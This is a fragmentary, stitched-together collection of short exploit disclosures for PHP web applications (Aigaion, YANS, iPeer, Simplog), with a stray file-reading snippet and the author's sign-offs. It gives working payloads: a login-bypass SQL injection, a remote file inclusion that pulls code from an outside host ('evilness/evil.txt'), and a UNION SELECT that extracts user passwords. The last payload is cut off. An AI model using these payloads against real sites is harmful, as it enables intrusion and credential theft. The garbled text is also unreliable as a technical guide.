This is bogus, about 5-10 lines above it includes a file which declares
$pathToFiles.
include ('./setup_options.php');
if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
$langOrig=$lang;
Software: Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script: _basicfunctions.php
author: navairum
Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/
vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND
password='$password'") or die (mysql_error());
Simple SQL injection:
' or '1=1
' or '1=1
-navairum
';
$handle=fopen($file,'r');
while(!feof($handle))
{
    if($handle)
    {
        $data = fgets($handle,filesize($file));
        $data.='br';
    }
    else
    {
        echo 'handle failed';
    }
    echo $data;
}
exit(0);
?>
Navairum
legalize it
can also change the background, title, and CSS page through this file.
-navairum
Product: http://ipeer.apsc.ubc.ca/ipeer_site/
version: 2.0 (I assume others too)
vulnerability:
http://some_host/ipeer_site/?page=http://evilness/evil.txt?
Software: Simplog www.simplog.org
version: 0.9.3.1 (I assume others as well)
There are a few SQL injections available with this software. This one is in preview.php
e.g.
http://site/preview.php?blogid=2adm=temtid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert